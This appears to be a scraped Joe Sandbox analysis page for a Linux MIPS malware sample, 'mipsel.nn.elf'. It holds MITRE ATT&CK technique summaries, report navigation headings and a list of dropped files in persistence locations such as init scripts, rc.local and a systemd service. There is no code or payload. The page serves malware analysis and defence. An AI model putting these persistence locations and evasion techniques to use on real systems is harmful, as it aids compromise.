Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mipsel.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/mipsel.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.G1igFI (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: mipsel.nn.elf PID: 6236, Parent PID: 6163

General

Chronological Activities

Analysis Process: mipsel.nn.elf PID: 6251, Parent PID: 6236

General

Chronological Activities

Analysis Process: sh PID: 6251, Parent PID: 6236

General

Chronological Activities

Analysis Process: sh PID: 6264, Parent PID: 6251

Linux Analysis Report
mipsel.nn.elf